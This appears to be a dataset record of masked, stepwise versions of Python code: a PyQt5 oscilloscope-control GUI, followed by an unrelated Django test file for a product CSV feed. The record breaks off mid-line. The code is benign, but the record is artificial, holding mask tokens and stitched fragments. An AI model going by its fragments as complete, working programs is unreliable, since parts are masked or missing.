self.startStopButton.setEnabled(False) startButtonLayout.addWidget(self.startStopButton) self.getScopeShot = QPushButton('Get Scope Shot', self) pictureGroupBox = QGroupBox() pictureLayout = QHBoxLayout() self.pictLabel = QLabel(self) pictureLayout.addWidget(self.pictLabel) pictureGroupBox.setLayout(pictureLayout) self.getScopeShot.clicked[bool].connect(self.scopeShot) self.getScopeShot.setEnabled(False) startButtonLayout.addWidget(self.getScopeShot) startButtonGroupBox.setLayout(startButtonLayout) grid = QGridLayout() grid.addWidget(instrumentGroupBox, 0, 0) grid.addWidget(startButtonGroupBox, 1, 0) grid.addWidget(pictureGroupBox, 2, 0) self.setLayout(grid) self.show() def initScope(self): self.instrumentName = self.scopeComboBox.currentText() # self.scope, self.scopeName = self.configInstrument.initInstrument(self.instrumentName) self.scope, self.scopeName = self.configInstrument.initInstrument("172.18.18.24") print ("Configured Scope: " + self.scopeName) self.scopeIDN.setText(self.scopeName) self.startStopButton.setEnabled(True) self.getScopeShot.setEnabled(True) def startStopTest(self): self.scope.setState(1, "ON") self.scope.setState(2, "ON") self.scope.setState(3, "ON") self.scope.setState(4, "ON") self.scope.setBandwidth(1, "ON") self.scope.setBandwidth(2, "ON") self.scope.setBandwidth(3, "ON") self.scope.setBandwidth(4, "ON") #Siglent library hard codes trigger level to mV self.scope.setEdgeTrigger(3, 50, "FALL") def scopeShot(self): print ("Get Scope Shot") self.scope.clear() print ("ReadIDN Returns: " + str(self.scope.readIDN())) print ("next line") self.scope.clear() self.scope.scopeScreenCaptureCopyToPC("siglentImage.png") # loading image self.pixmap = QPixmap("siglentImage.png") # adding image to label self.pictLabel.setText("Image Here") self.pictLabel.setPixmap(self.pixmap) # Optional, resize label to image size self.pictLabel.resize(self.pixmap.width(), self.pixmap.height()) if __name__ == '__main__': app = QCoreApplication.instance() if app is None: app = QApplication(sys.argv) ex = MainWindow() app.exec_()
normal
{ "blob_id": "33464f19c42d1a192792a73297f4d926df78ab71", "index": 2906, "step-1": "<mask token>\n\n\nclass MainWindow(QWidget):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def initUI(self):\n self.setGeometry(300, 300, 500, 600)\n self.setWindowTitle('Tektronix Channel Label Widget')\n self.setWindowIcon(QIcon('Steam_icon_logo.gif'))\n instrumentGroupBox = QGroupBox()\n instrumentGrid = QGridLayout()\n self.scopeComboBox = QComboBox()\n for index in range(0, len(self.instrumentList)):\n self.scopeComboBox.addItem(self.instrumentList[index].rstrip())\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\n self.initScopeButton = QPushButton('Initialize Scope', self)\n self.initScopeButton.clicked[bool].connect(self.initScope)\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\n scopeLabel = QLabel(self)\n scopeLabel.setText('Scope Type')\n instrumentGrid.addWidget(scopeLabel, 2, 0)\n self.scopeIDN = QLabel(self)\n self.scopeIDN.setText(self.instrumentName)\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\n instrumentGroupBox.setLayout(instrumentGrid)\n instrumentGroupBox.setLayout(instrumentGrid)\n startButtonGroupBox = QGroupBox()\n startButtonLayout = QHBoxLayout()\n self.startStopButton = QPushButton('Test Scope Connection', self)\n self.startStopButton.clicked[bool].connect(self.startStopTest)\n self.startStopButton.setEnabled(False)\n startButtonLayout.addWidget(self.startStopButton)\n self.getScopeShot = QPushButton('Get Scope Shot', self)\n pictureGroupBox = QGroupBox()\n pictureLayout = QHBoxLayout()\n self.pictLabel = QLabel(self)\n pictureLayout.addWidget(self.pictLabel)\n pictureGroupBox.setLayout(pictureLayout)\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\n self.getScopeShot.setEnabled(False)\n startButtonLayout.addWidget(self.getScopeShot)\n startButtonGroupBox.setLayout(startButtonLayout)\n grid = QGridLayout()\n grid.addWidget(instrumentGroupBox, 0, 0)\n grid.addWidget(startButtonGroupBox, 1, 0)\n grid.addWidget(pictureGroupBox, 2, 0)\n self.setLayout(grid)\n self.show()\n <mask token>\n\n def startStopTest(self):\n self.scope.setState(1, 'ON')\n self.scope.setState(2, 'ON')\n self.scope.setState(3, 'ON')\n self.scope.setState(4, 'ON')\n self.scope.setBandwidth(1, 'ON')\n self.scope.setBandwidth(2, 'ON')\n self.scope.setBandwidth(3, 'ON')\n self.scope.setBandwidth(4, 'ON')\n self.scope.setEdgeTrigger(3, 50, 'FALL')\n\n def scopeShot(self):\n print('Get Scope Shot')\n self.scope.clear()\n print('ReadIDN Returns: ' + str(self.scope.readIDN()))\n print('next line')\n self.scope.clear()\n self.scope.scopeScreenCaptureCopyToPC('siglentImage.png')\n self.pixmap = QPixmap('siglentImage.png')\n self.pictLabel.setText('Image Here')\n self.pictLabel.setPixmap(self.pixmap)\n self.pictLabel.resize(self.pixmap.width(), self.pixmap.height())\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass MainWindow(QWidget):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.configInstrument = Instrument()\n self.instrumentList = self.configInstrument.listInstruments()\n self.instrumentTypes = self.configInstrument.listInstrumentTypes()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 500, 600)\n self.setWindowTitle('Tektronix Channel Label Widget')\n self.setWindowIcon(QIcon('Steam_icon_logo.gif'))\n instrumentGroupBox = QGroupBox()\n instrumentGrid = QGridLayout()\n self.scopeComboBox = QComboBox()\n for index in range(0, len(self.instrumentList)):\n self.scopeComboBox.addItem(self.instrumentList[index].rstrip())\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\n self.initScopeButton = QPushButton('Initialize Scope', self)\n self.initScopeButton.clicked[bool].connect(self.initScope)\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\n scopeLabel = QLabel(self)\n scopeLabel.setText('Scope Type')\n instrumentGrid.addWidget(scopeLabel, 2, 0)\n self.scopeIDN = QLabel(self)\n self.scopeIDN.setText(self.instrumentName)\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\n instrumentGroupBox.setLayout(instrumentGrid)\n instrumentGroupBox.setLayout(instrumentGrid)\n startButtonGroupBox = QGroupBox()\n startButtonLayout = QHBoxLayout()\n self.startStopButton = QPushButton('Test Scope Connection', self)\n self.startStopButton.clicked[bool].connect(self.startStopTest)\n self.startStopButton.setEnabled(False)\n startButtonLayout.addWidget(self.startStopButton)\n self.getScopeShot = QPushButton('Get Scope Shot', self)\n pictureGroupBox = QGroupBox()\n pictureLayout = QHBoxLayout()\n self.pictLabel = QLabel(self)\n pictureLayout.addWidget(self.pictLabel)\n pictureGroupBox.setLayout(pictureLayout)\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\n self.getScopeShot.setEnabled(False)\n startButtonLayout.addWidget(self.getScopeShot)\n startButtonGroupBox.setLayout(startButtonLayout)\n grid = QGridLayout()\n grid.addWidget(instrumentGroupBox, 0, 0)\n grid.addWidget(startButtonGroupBox, 1, 0)\n grid.addWidget(pictureGroupBox, 2, 0)\n self.setLayout(grid)\n self.show()\n\n def initScope(self):\n self.instrumentName = self.scopeComboBox.currentText()\n self.scope, self.scopeName = self.configInstrument.initInstrument(\n '172.18.18.24')\n print('Configured Scope: ' + self.scopeName)\n self.scopeIDN.setText(self.scopeName)\n self.startStopButton.setEnabled(True)\n self.getScopeShot.setEnabled(True)\n\n def startStopTest(self):\n self.scope.setState(1, 'ON')\n self.scope.setState(2, 'ON')\n self.scope.setState(3, 'ON')\n self.scope.setState(4, 'ON')\n self.scope.setBandwidth(1, 'ON')\n self.scope.setBandwidth(2, 'ON')\n self.scope.setBandwidth(3, 'ON')\n self.scope.setBandwidth(4, 'ON')\n self.scope.setEdgeTrigger(3, 50, 'FALL')\n\n def scopeShot(self):\n print('Get Scope Shot')\n self.scope.clear()\n print('ReadIDN Returns: ' + str(self.scope.readIDN()))\n print('next line')\n self.scope.clear()\n self.scope.scopeScreenCaptureCopyToPC('siglentImage.png')\n self.pixmap = QPixmap('siglentImage.png')\n self.pictLabel.setText('Image Here')\n self.pictLabel.setPixmap(self.pixmap)\n self.pictLabel.resize(self.pixmap.width(), self.pixmap.height())\n\n\n<mask token>\n", "step-3": "<mask token>\nsys.path.append('../Instrument_Libraries')\n<mask token>\nmyappid = u'mycompany.myproduct.subproduct.version'\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n\n\nclass MainWindow(QWidget):\n instrumentName = 'Unitialized Instrument'\n instrumentList = []\n instrumentTypes = {}\n instrumentKey = 'Uninitialized Key'\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.configInstrument = Instrument()\n self.instrumentList = self.configInstrument.listInstruments()\n self.instrumentTypes = self.configInstrument.listInstrumentTypes()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 500, 600)\n self.setWindowTitle('Tektronix Channel Label Widget')\n self.setWindowIcon(QIcon('Steam_icon_logo.gif'))\n instrumentGroupBox = QGroupBox()\n instrumentGrid = QGridLayout()\n self.scopeComboBox = QComboBox()\n for index in range(0, len(self.instrumentList)):\n self.scopeComboBox.addItem(self.instrumentList[index].rstrip())\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\n self.initScopeButton = QPushButton('Initialize Scope', self)\n self.initScopeButton.clicked[bool].connect(self.initScope)\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\n scopeLabel = QLabel(self)\n scopeLabel.setText('Scope Type')\n instrumentGrid.addWidget(scopeLabel, 2, 0)\n self.scopeIDN = QLabel(self)\n self.scopeIDN.setText(self.instrumentName)\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\n instrumentGroupBox.setLayout(instrumentGrid)\n instrumentGroupBox.setLayout(instrumentGrid)\n startButtonGroupBox = QGroupBox()\n startButtonLayout = QHBoxLayout()\n self.startStopButton = QPushButton('Test Scope Connection', self)\n self.startStopButton.clicked[bool].connect(self.startStopTest)\n self.startStopButton.setEnabled(False)\n startButtonLayout.addWidget(self.startStopButton)\n self.getScopeShot = QPushButton('Get Scope Shot', self)\n pictureGroupBox = QGroupBox()\n pictureLayout = QHBoxLayout()\n self.pictLabel = QLabel(self)\n pictureLayout.addWidget(self.pictLabel)\n pictureGroupBox.setLayout(pictureLayout)\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\n self.getScopeShot.setEnabled(False)\n startButtonLayout.addWidget(self.getScopeShot)\n startButtonGroupBox.setLayout(startButtonLayout)\n grid = QGridLayout()\n grid.addWidget(instrumentGroupBox, 0, 0)\n grid.addWidget(startButtonGroupBox, 1, 0)\n grid.addWidget(pictureGroupBox, 2, 0)\n self.setLayout(grid)\n self.show()\n\n def initScope(self):\n self.instrumentName = self.scopeComboBox.currentText()\n self.scope, self.scopeName = self.configInstrument.initInstrument(\n '172.18.18.24')\n print('Configured Scope: ' + self.scopeName)\n self.scopeIDN.setText(self.scopeName)\n self.startStopButton.setEnabled(True)\n self.getScopeShot.setEnabled(True)\n\n def startStopTest(self):\n self.scope.setState(1, 'ON')\n self.scope.setState(2, 'ON')\n self.scope.setState(3, 'ON')\n self.scope.setState(4, 'ON')\n self.scope.setBandwidth(1, 'ON')\n self.scope.setBandwidth(2, 'ON')\n self.scope.setBandwidth(3, 'ON')\n self.scope.setBandwidth(4, 'ON')\n self.scope.setEdgeTrigger(3, 50, 'FALL')\n\n def scopeShot(self):\n print('Get Scope Shot')\n self.scope.clear()\n print('ReadIDN Returns: ' + str(self.scope.readIDN()))\n print('next line')\n self.scope.clear()\n self.scope.scopeScreenCaptureCopyToPC('siglentImage.png')\n self.pixmap = QPixmap('siglentImage.png')\n self.pictLabel.setText('Image Here')\n self.pictLabel.setPixmap(self.pixmap)\n self.pictLabel.resize(self.pixmap.width(), self.pixmap.height())\n\n\nif __name__ == '__main__':\n app = QCoreApplication.instance()\n if app is None:\n app = QApplication(sys.argv)\n ex = MainWindow()\n app.exec_()\n", "step-4": "<mask token>\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QRadioButton, QVBoxLayout, QCheckBox, QProgressBar, QGroupBox, QComboBox, QLineEdit, QPushButton, QMessageBox, QInputDialog, QDialog, QDialogButtonBox, QSlider, QGridLayout, QHBoxLayout\nfrom PyQt5.QtGui import QIcon, QPainter, QPen, QFont, QPixmap\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtCore import QCoreApplication, QObject, QRunnable, QThread, QThreadPool, pyqtSignal, pyqtSlot\nsys.path.append('../Instrument_Libraries')\nfrom instrumentConfig import Instrument\nimport ctypes\nmyappid = u'mycompany.myproduct.subproduct.version'\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n\n\nclass MainWindow(QWidget):\n instrumentName = 'Unitialized Instrument'\n instrumentList = []\n instrumentTypes = {}\n instrumentKey = 'Uninitialized Key'\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.configInstrument = Instrument()\n self.instrumentList = self.configInstrument.listInstruments()\n self.instrumentTypes = self.configInstrument.listInstrumentTypes()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 500, 600)\n self.setWindowTitle('Tektronix Channel Label Widget')\n self.setWindowIcon(QIcon('Steam_icon_logo.gif'))\n instrumentGroupBox = QGroupBox()\n instrumentGrid = QGridLayout()\n self.scopeComboBox = QComboBox()\n for index in range(0, len(self.instrumentList)):\n self.scopeComboBox.addItem(self.instrumentList[index].rstrip())\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\n self.initScopeButton = QPushButton('Initialize Scope', self)\n self.initScopeButton.clicked[bool].connect(self.initScope)\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\n scopeLabel = QLabel(self)\n scopeLabel.setText('Scope Type')\n instrumentGrid.addWidget(scopeLabel, 2, 0)\n self.scopeIDN = QLabel(self)\n self.scopeIDN.setText(self.instrumentName)\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\n instrumentGroupBox.setLayout(instrumentGrid)\n instrumentGroupBox.setLayout(instrumentGrid)\n startButtonGroupBox = QGroupBox()\n startButtonLayout = QHBoxLayout()\n self.startStopButton = QPushButton('Test Scope Connection', self)\n self.startStopButton.clicked[bool].connect(self.startStopTest)\n self.startStopButton.setEnabled(False)\n startButtonLayout.addWidget(self.startStopButton)\n self.getScopeShot = QPushButton('Get Scope Shot', self)\n pictureGroupBox = QGroupBox()\n pictureLayout = QHBoxLayout()\n self.pictLabel = QLabel(self)\n pictureLayout.addWidget(self.pictLabel)\n pictureGroupBox.setLayout(pictureLayout)\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\n self.getScopeShot.setEnabled(False)\n startButtonLayout.addWidget(self.getScopeShot)\n startButtonGroupBox.setLayout(startButtonLayout)\n grid = QGridLayout()\n grid.addWidget(instrumentGroupBox, 0, 0)\n grid.addWidget(startButtonGroupBox, 1, 0)\n grid.addWidget(pictureGroupBox, 2, 0)\n self.setLayout(grid)\n self.show()\n\n def initScope(self):\n self.instrumentName = self.scopeComboBox.currentText()\n self.scope, self.scopeName = self.configInstrument.initInstrument(\n '172.18.18.24')\n print('Configured Scope: ' + self.scopeName)\n self.scopeIDN.setText(self.scopeName)\n self.startStopButton.setEnabled(True)\n self.getScopeShot.setEnabled(True)\n\n def startStopTest(self):\n self.scope.setState(1, 'ON')\n self.scope.setState(2, 'ON')\n self.scope.setState(3, 'ON')\n self.scope.setState(4, 'ON')\n self.scope.setBandwidth(1, 'ON')\n self.scope.setBandwidth(2, 'ON')\n self.scope.setBandwidth(3, 'ON')\n self.scope.setBandwidth(4, 'ON')\n self.scope.setEdgeTrigger(3, 50, 'FALL')\n\n def scopeShot(self):\n print('Get Scope Shot')\n self.scope.clear()\n print('ReadIDN Returns: ' + str(self.scope.readIDN()))\n print('next line')\n self.scope.clear()\n self.scope.scopeScreenCaptureCopyToPC('siglentImage.png')\n self.pixmap = QPixmap('siglentImage.png')\n self.pictLabel.setText('Image Here')\n self.pictLabel.setPixmap(self.pixmap)\n self.pictLabel.resize(self.pixmap.width(), self.pixmap.height())\n\n\nif __name__ == '__main__':\n app = QCoreApplication.instance()\n if app is None:\n app = QApplication(sys.argv)\n ex = MainWindow()\n app.exec_()\n", "step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on 11/03/2020\r\n\r\n@author: [email protected]\r\n\"\"\"\r\nimport sys\r\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QLabel, QRadioButton, QVBoxLayout, QCheckBox, QProgressBar,\r\n QGroupBox, QComboBox, QLineEdit, QPushButton, QMessageBox, QInputDialog, QDialog, QDialogButtonBox, QSlider, QGridLayout, QHBoxLayout)\r\nfrom PyQt5.QtGui import QIcon, QPainter, QPen, QFont, QPixmap\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtCore import QCoreApplication, QObject, QRunnable, QThread, QThreadPool, pyqtSignal, pyqtSlot\r\n\r\n#append the relative location you want to import from\r\nsys.path.append(\"../Instrument_Libraries\")\r\nfrom instrumentConfig import Instrument\r\n \r\n#For some reason the following code needs to be here for the Steam icon to show on the taskbar.\r\n#Google code, don't know why.\r\nimport ctypes\r\nmyappid = u'mycompany.myproduct.subproduct.version' # arbitrary string\r\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) \r\n\r\nclass MainWindow(QWidget):\r\n\r\n instrumentName = \"Unitialized Instrument\"\r\n \r\n \r\n instrumentList = []\r\n #Instrument Types is a dictionary\r\n instrumentTypes = {}\r\n instrumentKey = \"Uninitialized Key\"\r\n \r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n \r\n self.configInstrument = Instrument()\r\n self.instrumentList = self.configInstrument.listInstruments()\r\n self.instrumentTypes = self.configInstrument.listInstrumentTypes()\r\n\r\n self.initUI()\r\n\r\n\r\n def initUI(self): \r\n \r\n self.setGeometry(300, 300, 500, 600)\r\n self.setWindowTitle('Tektronix Channel Label Widget')\r\n self.setWindowIcon(QIcon('Steam_icon_logo.gif')) \r\n \r\n instrumentGroupBox = QGroupBox()\r\n instrumentGrid = QGridLayout()\r\n \r\n self.scopeComboBox = QComboBox()\r\n for index in range (0, len(self.instrumentList)):\r\n self.scopeComboBox.addItem(self.instrumentList[index].rstrip()) \r\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\r\n \r\n self.initScopeButton = QPushButton('Initialize Scope', self)\r\n self.initScopeButton.clicked[bool].connect(self.initScope)\r\n \r\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\r\n\r\n scopeLabel = QLabel(self)\r\n scopeLabel.setText(\"Scope Type\")\r\n instrumentGrid.addWidget(scopeLabel, 2, 0)\r\n\r\n self.scopeIDN = QLabel(self)\r\n self.scopeIDN.setText(self.instrumentName)\r\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\r\n \r\n instrumentGroupBox.setLayout(instrumentGrid)\r\n \r\n instrumentGroupBox.setLayout(instrumentGrid)\r\n\r\n startButtonGroupBox = QGroupBox()\r\n startButtonLayout = QHBoxLayout()\r\n self.startStopButton = QPushButton('Test Scope Connection', self)\r\n \r\n self.startStopButton.clicked[bool].connect(self.startStopTest)\r\n self.startStopButton.setEnabled(False)\r\n startButtonLayout.addWidget(self.startStopButton)\r\n\r\n\r\n self.getScopeShot = QPushButton('Get Scope Shot', self)\r\n \r\n\r\n pictureGroupBox = QGroupBox()\r\n pictureLayout = QHBoxLayout()\r\n self.pictLabel = QLabel(self)\r\n pictureLayout.addWidget(self.pictLabel)\r\n pictureGroupBox.setLayout(pictureLayout)\r\n\r\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\r\n self.getScopeShot.setEnabled(False)\r\n startButtonLayout.addWidget(self.getScopeShot)\r\n\r\n startButtonGroupBox.setLayout(startButtonLayout)\r\n\r\n grid = QGridLayout()\r\n grid.addWidget(instrumentGroupBox, 0, 0)\r\n grid.addWidget(startButtonGroupBox, 1, 0)\r\n grid.addWidget(pictureGroupBox, 2, 0)\r\n\r\n self.setLayout(grid)\r\n\r\n self.show()\r\n\r\n def initScope(self):\r\n \r\n self.instrumentName = self.scopeComboBox.currentText()\r\n \r\n # self.scope, self.scopeName = self.configInstrument.initInstrument(self.instrumentName)\r\n self.scope, self.scopeName = self.configInstrument.initInstrument(\"172.18.18.24\")\r\n \r\n print (\"Configured Scope: \" + self.scopeName)\r\n \r\n self.scopeIDN.setText(self.scopeName)\r\n\r\n self.startStopButton.setEnabled(True)\r\n self.getScopeShot.setEnabled(True)\r\n\r\n def startStopTest(self):\r\n \r\n self.scope.setState(1, \"ON\")\r\n self.scope.setState(2, \"ON\")\r\n self.scope.setState(3, \"ON\")\r\n self.scope.setState(4, \"ON\")\r\n \r\n self.scope.setBandwidth(1, \"ON\")\r\n self.scope.setBandwidth(2, \"ON\")\r\n self.scope.setBandwidth(3, \"ON\")\r\n self.scope.setBandwidth(4, \"ON\")\r\n \r\n #Siglent library hard codes trigger level to mV\r\n self.scope.setEdgeTrigger(3, 50, \"FALL\")\r\n \r\n def scopeShot(self):\r\n print (\"Get Scope Shot\")\r\n self.scope.clear()\r\n print (\"ReadIDN Returns: \" + str(self.scope.readIDN()))\r\n print (\"next line\")\r\n self.scope.clear()\r\n \r\n self.scope.scopeScreenCaptureCopyToPC(\"siglentImage.png\")\r\n \r\n # loading image \r\n self.pixmap = QPixmap(\"siglentImage.png\") \r\n \r\n # adding image to label \r\n self.pictLabel.setText(\"Image Here\") \r\n self.pictLabel.setPixmap(self.pixmap) \r\n \r\n # Optional, resize label to image size \r\n self.pictLabel.resize(self.pixmap.width(), \r\n self.pixmap.height()) \r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n app = QCoreApplication.instance()\r\n if app is None:\r\n app = QApplication(sys.argv)\r\n ex = MainWindow()\r\n app.exec_() \r\n", "step-ids": [ 4, 6, 9, 10, 11 ] }
[ 4, 6, 9, 10, 11 ]
#! /usr/bin/env python # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.test import TestCase from django.core.urlresolvers import reverse from google_product_feeder.feed import CSVMerchantFeed, MERCHANT_FEED_COLUMNS CSV_HEADINGS = ','.join(MERCHANT_FEED_COLUMNS) + '\r\n' class AttrNameFakeModel(object): # A fake model that returns the attribute name upon attribute access. def __getattr__(self, name): return name class EmptyFakeModel(object): # A fake model with no attributes. def __getattr__(self, name): raise AttributeError class UppercaseBrandFeed(CSVMerchantFeed): def get_brand(self, obj): return obj.brand.upper() class CSVMerchantFeedTest(TestCase): def test_csv_empty(self): feed = CSVMerchantFeed([]) output = feed.get_content() self.assertEquals(output, CSV_HEADINGS) def test_csv(self): feed = CSVMerchantFeed([AttrNameFakeModel()]) output = feed.get_content() self.assertEquals(output, CSV_HEADINGS * 2) def test_csv_missing_attribute(self): feed = CSVMerchantFeed([EmptyFakeModel()]) output = feed.get_content() empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\r\n' self.assertEquals(output, CSV_HEADINGS + empty_data_row) def test_csv_with_get_method(self): feed = UppercaseBrandFeed([AttrNameFakeModel()]) output = feed.get_content() data_row = CSV_HEADINGS.replace('brand', 'BRAND') self.assertEquals(output, CSV_HEADINGS + data_row) class CSVFeedViewTest(TestCase): def test_view_empty(self): url = reverse('google_feed') response = self.client.get(url) self.assertEquals(response.content, CSV_HEADINGS) def test_has_correct_headers(self): # content-type is 'text/csv', content-disposition is 'attachment', # filename is 'google.csv' url = reverse('google_feed') response = self.client.get(url) self.assertEqual(response['Content-Type'], 'text/csv') self.assertEqual(response['Content-Disposition'], 'attachment; filename="google.csv"')
normal
{ "blob_id": "924fd89a835528fa28e1226912a2e4be9c4e1d5d", "index": 152, "step-1": "<mask token>\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'], 'text/csv')\n self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-2": "<mask token>\n\n\nclass AttrNameFakeModel(object):\n <mask token>\n\n\nclass EmptyFakeModel(object):\n\n def __getattr__(self, name):\n raise AttributeError\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'], 'text/csv')\n self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-3": "<mask token>\n\n\nclass AttrNameFakeModel(object):\n\n def __getattr__(self, name):\n return name\n\n\nclass EmptyFakeModel(object):\n\n def __getattr__(self, name):\n raise AttributeError\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'], 'text/csv')\n self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-4": "from __future__ import unicode_literals\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom google_product_feeder.feed import CSVMerchantFeed, MERCHANT_FEED_COLUMNS\nCSV_HEADINGS = ','.join(MERCHANT_FEED_COLUMNS) + '\\r\\n'\n\n\nclass AttrNameFakeModel(object):\n\n def __getattr__(self, name):\n return name\n\n\nclass EmptyFakeModel(object):\n\n def __getattr__(self, name):\n raise AttributeError\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'], 'text/csv')\n 